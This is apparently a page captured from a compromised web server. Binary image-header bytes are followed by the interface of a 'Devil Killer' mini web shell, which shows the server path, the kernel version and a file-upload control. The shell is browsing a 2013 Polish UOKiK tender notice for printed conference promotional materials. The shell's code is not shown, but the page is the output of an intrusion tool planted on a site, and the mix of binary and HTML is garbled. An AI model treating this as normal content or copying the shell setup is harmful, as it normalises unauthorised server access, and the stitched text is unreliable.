JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130130/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130130/40664-N-2013.html

<p class="kh_header"><b>Warszawa: Druk i dostawa materiałów promocyjnych z logo ICN dla Urzędu Ochrony Konkurencji i Konsumentów</b><br>
<b>Numer ogłoszenia: 40664 - 2013; data zamieszczenia: 30.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Ochrony Konkurencji i Konsumentów , Pl.  Powstańców Warszawy 1, 00-950 Warszawa, woj. mazowieckie, tel. 022 5560129, faks 022 8270843.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.uokik.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Druk i dostawa materiałów promocyjnych z logo ICN dla Urzędu Ochrony Konkurencji i Konsumentów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie i dostawa do siedziby UOKiK materiałów promocyjnych z logo ICN, według poniższej specyfikacji:

Część I
Wykonanie smyczy wraz z nadrukiem zgodnie z wizualizacją stanowiącą Załącznik Nr 1 do SIWZ
Ilość: 600 sztuk
Kolor: żółty (pantone 7404C)
Typ: taśma poliestrowa
Szerokość: 15mm
Nadruk: 1+1 (czarny)
Rodzaj nadruku: sublimacyjny
Karabińczyk: metalowy
Długość taśmy: 90cm

Wykonanie wraz z nadrukiem notatników na spirali doczepionych do twardej okładki zgodnie z wizualizacją stanowiącą Załącznik Nr 1 do SIWZ
Ilość: 630 sztuk
Kartki notesu
Rodzaj papieru: offset 80g,
Zadruk:  CMYK 4+0
Ilość kartek: 100, przy czym:
25 kartek o wymiarze 195x210mm z paskiem w kolorze zielonym (CMYK: 65.5.100.0)
25 kartek o wymiarze 185x210mm z paskiem w kolorze czerwonym (CMYK: 0.100.64.0)
25 kartek o wymiarze 175x210mm z paskiem w kolorze niebieskim (CMYK: 100.0.32.0)
25 kartek o wymiarze 165x210mm z paskiem w kolorze żółtym (CMYK: 0.15.100.0)
.okładka
Okładka 3 skrzydełka i na 3 skrzydełku przyspiralowany notes.
Oprawa: twarda, karton 2mm
Oklejka:
format: 670x250mm 
papier: kreda 150g 
kolorystyka: 4+0 
Folia Matt B-2 jedna strona
Wyklejka:
format: 670x250mm 
papier: kreda 150g 
Spirala w kolorze białym
Pakowanie: po 50 szt.

Wykonanie nadruku na długopisie zgodnie wizualizacją stanowiącą Załącznik Nr 1 do SIWZ
Ilość: 600 sztuk
materiał: plastik
kolor długopisu: czerwony
wygląd: przyciskany długopis z kulką w kolorze czerwonym na górze. 
Klips i końcówka przezroczyste. 
Wkład: Czarny lub niebieski
Wymiary: 14cm +.- 1cm
Nadruk: jeden jednokolorowy(biały) 
Wielkość nadruku: 23x5mm

Wykonanie nadruku na ołówku zgodnie z wizualizacją stanowiącą Załącznik Nr 1 do SIWZ
Ilość: 600 sztuk
Ołówek elastyczny z gumką 
Długość: 34cm +.- 1cm
Nadruk: jeden jednokolorowy (żółty pantone 7404C)
Kolor ołówka: niebieski
Kolor gumki: niebieski
Wielkość nadruku:  40x3mm

Wykonanie toreb wraz z nadrukiem zgodnie z wizualizacją stanowiącą Załącznik Nr 1 do SIWZ
Ilość: 600 sztuk
Torba: 38x40x10cm  
Długość ucha torby: łącznie 188cm (liczona od spodu 38cm spód + 40cm lewy bok + 70cm uchwyt + 40cm prawy bok) 
Wygląd: ucho torby musi być obszyte dookoła całej torby, z kolei początek uchwytu o szerokości 10 cm będzie musiał być łagodnie zwężony tak, aby w miejscu założenia torby jego szerokość wynosiła 8 cm.
Nadruki na torbie: z jednej strony czterokolorowy (pantone: żółty 7404C, zielony 360C, czerwony 192C, niebieski 7466C),
Nadruk na uchu torby: jeden jednokolorowy (czarny - blackC) 
Torba musi mieć wytrzymałość do 5 kg

Wykonanie naklejek z logo ICN zgodnie z wizualizacją stanowiącą Załącznik Nr 1 do SIWZ
Ilość: 1200 sztuk
Kształt: okrągłe z nadrukiem logo
Materiał: papier samoprzylepny rysowany
Średnica: 48mm
Zadruk: 2+0 (cmyk), folia błyszcząca
Naklejki wydrukowane na arkuszach zbiorczych o formacie A4

Termin realizacji: 17 dni roboczych.
W dniu podpisania umowy Wykonawca przekaże Zamawiającemu dokładną specyfikację techniczną  na podstawie, której Zamawiający przygotuje projekty wszystkich materiałów promocyjnych. 
Projekty o których mowa w punkcie 2 zostaną przekazane najpóźniej w ciągu 4 dni od momentu otrzymania pełnej specyfikacji. 
Projekty zostaną przekazane Wykonawcy poprzez wgranie na udostępniony Zamawiającemu ftp.
W projektach należy użyć czcionkę Planer w odmianie Regular (OTF).
Dostawa oznacza dostarczenie przedmiotu umowy do siedziby UOKiK oraz wniesienie w miejsce wskazane przez Zamawiającego (I piętro bez windy).

Część II
Wykonanie szarf dla organizatorów wraz z nadrukiem zgodnie z wizualizacją stanowiącą Załącznik Nr 1 do SIWZ
Ilość: 30 sztuk
Wymiar: 206x12 cm
Kolor szarfy: żółty (pantone: 7404C)
Nadruk: 1+0 (czarny)
Materiał: dzianina satynowa o gramaturze 115g/m2

Wykonanie zasłony wraz z nadrukiem do zawieszenia w Muzeum Narodowym zgodnie z wizualizacją stanowiącą Załącznik Nr 1 do SIWZ
Ilość: 1 sztuka
Wymiary: 2,4x7,5 m
Materiał: dzianina z atestem na niepalność klasy B1 o gramaturze 230g.m2
Nadruk: full kolor
Wykończenie: tunel góra i tunel dół

Wykonanie standu typu Monidło z doczepianymi, wymiennymi elementami zgodnie                   z wizualizacją stanowiącą Załącznik Nr 1 do SIWZ
Cel: Stand typu Monidłobędzie pełniło funkcję integracyjną podczas trzydniowej, dorocznej konferencji ICN. Każdy uczestnik będzie miał możliwość zrobienia zdjęcia oraz wybrania i doczepienia elementu z wybranym przez siebie hasłem. 
Z tego też względu przy produkcji tego standu należy wziąć pod uwagę, aby:
był on stabilny - każdy uczestnik będzie miał możliwość doczepienia wybranego przez siebie napisu. Zatem należy mieć na uwadze, że musi być ono stabilne i wytrzymałe - konferencja będzie trwała 3 dni. jego powierzchnia nie może odbijać fleszy - na jego tle będą robione zdjęcia.
musi mieć odpowiednie mocowania elementów wymiennych, tzw. hangerów z napisami. Elementy te mogą być przyczepiane za pomocą magnesów lub rzepów. Jednakże, mocowania te muszą utrzymywać wymienne elementy i zapewnić ich użytkowanie przez wszystkie dni konferencji.
elementy wymienne nie mogą być zbyt ciężkie.
Stand z podparciem i dwoma wycięciami na głowę
Ilość: 1 sztuka
Wymiary: 200x199 cm
Zadruk: 4+0 (CMYK)
Pokrycie: folia matowa 
Wymienne elementy tzw. hangery z nadrukowanymi hasłami
Ilość: 6 sztuk
Kształt: koło o średnicy 44cm
Materiał: karton o grubości 2-3mm pokryty matową folią 
Zadruk: 4+0 (CMYK)
Rodzaj mocowania: magnesy lub rzepy

Termin realizacji: 15 dni roboczych.
W dniu podpisania umowy Wykonawca przekaże Zamawiającemu dokładną specyfikację techniczną na podstawie której Zamawiający przygotuje projekty wszystkich materiałów promocyjnych. 
Projekty o których mowa w punkcie 2 zostaną przekazane najpóźniej w ciągu 4 dni od momentu otrzymania pełnej specyfikacji. 
Projekty zostaną przekazane Wykonawcy poprzez wgranie na udostępniony Zamawiającemu ftp.
W projektach należy użyć czcionkę Planer w odmianie Regular (OTF).
6. Dostawa oznacza dostarczenie przedmiotu umowy do siedziby UOKiK oraz wniesienie w miejsce wskazane przez Zamawiającego (I piętro bez windy)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 17.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia publicznego, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał (a w przypadku świadczeń okresowych lub ciągłych również wykonuje) co najmniej jedno zamówienie odpowiadające swoim rodzajem przedmiotowi zamówienia jak określony w SIWZ:
 tj. wykonanie materiałów promocyjnych z nadrukiem o wartości nie mniejszej niż: dla części I 12 000,00 zł brutto, 
tj. wykonanie monidła stojącego dla części II. 
Wykonawca musi potwierdzić należyte wykonanie wskazanych prac, poprzez przedstawienie odpowiednich dokumentów wystawionych przez zamawiającego lub odbiorcę dostawy.
Podana wartość musi dotyczyć jednego zamówienia (przez co rozumie się, że musi
wynikać z jednostkowej umowy) - Załącznik Nr 4 do SIWZ (Wykaz wykonanych podobnych zamówień dla części I), 
Załącznik Nr 5 do SIWZ (Wykaz wykonanych podobnych zamówień dla części II).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>tak</p>
<ul class="kh_indent_1" style="text-align: justify;"><li>należy przedłożyć oświadczenie wykonawcy o zatrudnianiu ponad 50% osób niepełnosprawnych w rozumieniu przepisów o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych, lub w rozumieniu właściwych przepisów państw członkowskich Unii Europejskiej lub Europejskiego Obszaru Gospodarczego - jeżeli wykonawca ma siedzibę lub miejsce zamieszkania w tych państwach</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany dotyczyć mogą następujących kwestii:

a) osoby uprawnionej do kontaktu lub podpisania protokołu odbioru ze strony        Zamawiającego lub Wykonawcy.
Zmiana dokonana zostanie w przypadku zaistnienia okoliczności faktycznie obiektywnych, które uniemożliwiać będą konkretnej osobie wskazanej w umowie do realizacji jej postanowień, np.: rozwiązanie umowy o pracę, choroba, śmierć pracownika, utrata uprawnień, itp., 
b) stawki podatku VAT, zgodnie w powszechnie obowiązującymi przepisami prawa                      z uwzględnieniem zmiany w całościowym wynagrodzeniu Wykonawcy.
Zmiana dokonana zostanie w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie rozliczeń podatkowych i obowiązujących stawek podatku VAT mających związek z niniejszym przedmiotem zamówienia,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.uokik.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd ochrony Konkurencji i Konsumentów 
Pl. Powstańców Warszawy 1
00-950 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.02.2013 godzina 11:00, miejsce: Urząd ochrony Konkurencji i Konsumentów 
Pl. Powstańców Warszawy 1
00-950 Warszawa, koncelaria p. 116 (p. I).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przedmiotem zamówienia jest wykonanie i dostawa do siedziby UOKiK materiałów promocyjnych z logo ICN, według poniższej specyfikacji:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie smyczy wraz z nadrukiem zgodnie z wizualizacją stanowiącą Załącznik Nr 1 do SIWZ
Ilość: 600 sztuk
Kolor: żółty (pantone 7404C)
Typ: taśma poliestrowa
Szerokość: 15mm
Nadruk: 1+1 (czarny)
Rodzaj nadruku: sublimacyjny
Karabińczyk: metalowy
Długość taśmy: 90cm

Wykonanie wraz z nadrukiem notatników na spirali doczepionych do twardej okładki zgodnie z wizualizacją stanowiącą Załącznik Nr 1 do SIWZ
Ilość: 630 sztuk
Kartki notesu
Rodzaj papieru: offset 80g,
Zadruk:  CMYK 4+0
Ilość kartek: 100, przy czym: 25 kartek o wymiarze 195x210mm z paskiem w kolorze zielonym (CMYK: 65.5.100.0)
25 kartek o wymiarze 185x210mm z paskiem w kolorze czerwonym (CMYK: 0.100.64.0) 25 kartek o wymiarze 175x210mm z paskiem w kolorze niebieskim (CMYK: 100.0.32.0)
25 kartek o wymiarze 165x210mm z paskiem w kolorze żółtym (CMYK: 0.15.100.0)
okładka
Okładka 3 skrzydełka i na 3 skrzydełku przyspiralowany notes.
Oprawa: twarda, karton 2mm
Oklejka:
 format: 670x250mm 
papier: kreda 150g 
kolorystyka: 4+0 
Folia Matt B-2 jedna strona
Wyklejka:
format: 670x250mm 
 papier: kreda 150g 
Spirala w kolorze białym
Pakowanie: po 50 szt.

Wykonanie nadruku na długopisie zgodnie wizualizacją stanowiącą Załącznik Nr 1 do SIWZ
Ilość: 600 sztuk
materiał: plastik
kolor długopisu: czerwony
wygląd: przyciskany długopis z kulką w kolorze czerwonym na górze. 
Klips i końcówka przezroczyste. 
Wkład: Czarny lub niebieski
Wymiary: 14cm +.- 1cm
Nadruk: jeden jednokolorowy(biały) 
Wielkość nadruku: 23x5mm

Wykonanie nadruku na ołówku zgodnie z wizualizacją stanowiącą Załącznik Nr 1 do SIWZ
Ilość: 600 sztuk
Ołówek elastyczny z gumką 
Długość: 34cm +.- 1cm
Nadruk: jeden jednokolorowy (żółty pantone 7404C)
Kolor ołówka: niebieski
Kolor gumki: niebieski
Wielkość nadruku:  40x3mm

Wykonanie toreb wraz z nadrukiem zgodnie z wizualizacją stanowiącą Załącznik Nr 1 do SIWZ
Ilość: 600 sztuk
Torba: 38x40x10cm  
Długość ucha torby: łącznie 188cm (liczona od spodu 38cm spód + 40cm lewy bok + 70cm uchwyt + 40cm prawy bok) 
Wygląd: ucho torby musi być obszyte dookoła całej torby, z kolei początek uchwytu o szerokości 10 cm będzie musiał być łagodnie zwężony tak, aby w miejscu założenia torby jego szerokość wynosiła 8 cm.
Nadruki na torbie: z jednej strony czterokolorowy (pantone: żółty 7404C, zielony 360C, czerwony 192C, niebieski 7466C),
Nadruk na uchu torby: jeden jednokolorowy (czarny - blackC) 
Torba musi mieć wytrzymałość do 5 kg

Wykonanie naklejek z logo ICN zgodnie z wizualizacją stanowiącą Załącznik Nr 1 do SIWZ
Ilość: 1200 sztuk
Kształt: okrągłe z nadrukiem logo
Materiał: papier samoprzylepny rysowany
Średnica: 48mm
Zadruk: 2+0 (cmyk), folia błyszcząca
Naklejki wydrukowane na arkuszach zbiorczych o formacie A4

 Termin realizacji: 17 dni roboczych.
 W dniu podpisania umowy Wykonawca przekaże Zamawiającemu dokładną specyfikację techniczną  na podstawie, której Zamawiający przygotuje projekty wszystkich materiałów promocyjnych. 
Projekty o których mowa w punkcie 2 zostaną przekazane najpóźniej w ciągu 4 dni od momentu otrzymania pełnej specyfikacji. 
Projekty zostaną przekazane Wykonawcy poprzez wgranie na udostępniony Zamawiającemu ftp.
 W projektach należy użyć czcionkę Planer w odmianie Regular (OTF).
Dostawa oznacza dostarczenie przedmiotu umowy do siedziby UOKiK oraz wniesienie w miejsce wskazane przez Zamawiającego (I piętro bez windy)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 17.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przedmiotem zamówienia jest wykonanie i dostawa do siedziby UOKiK materiałów promocyjnych z logo ICN, według poniższej specyfikacji:.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wykonanie szarf dla organizatorów wraz z nadrukiem zgodnie z wizualizacją stanowiącą Załącznik Nr 1 do SIWZ
Ilość: 30 sztuk
Wymiar: 206x12 cm
Kolor szarfy: żółty (pantone: 7404C)
Nadruk: 1+0 (czarny)
Materiał: dzianina satynowa o gramaturze 115g/m2

Wykonanie zasłony wraz z nadrukiem do zawieszenia w Muzeum Narodowym zgodnie z wizualizacją stanowiącą Załącznik Nr 1 do SIWZ
Ilość: 1 sztuka
Wymiary: 2,4x7,5 m
Materiał: dzianina z atestem na niepalność klasy B1 o gramaturze 230g/m2
Nadruk: full kolor
Wykończenie: tunel góra i tunel dół

Wykonanie standu typu Monidło z doczepianymi, wymiennymi elementami zgodnie                   z wizualizacją stanowiącą Załącznik Nr 1 do SIWZ
Cel: Stand typu Monidło będzie pełniło funkcję integracyjną podczas trzydniowej, dorocznej konferencji ICN. Każdy uczestnik będzie miał możliwość zrobienia zdjęcia oraz wybrania i doczepienia elementu z wybranym przez siebie hasłem. 
Z tego też względu przy produkcji tego standu należy wziąć pod uwagę, aby:
był on stabilny  każdy uczestnik będzie miał możliwość doczepienia wybranego przez siebie napisu. Zatem należy mieć na uwadze, że musi być ono stabilne i wytrzymałe  konferencja będzie trwała 3 dni.
jego powierzchnia nie może odbijać fleszy  na jego tle będą robione zdjęcia.
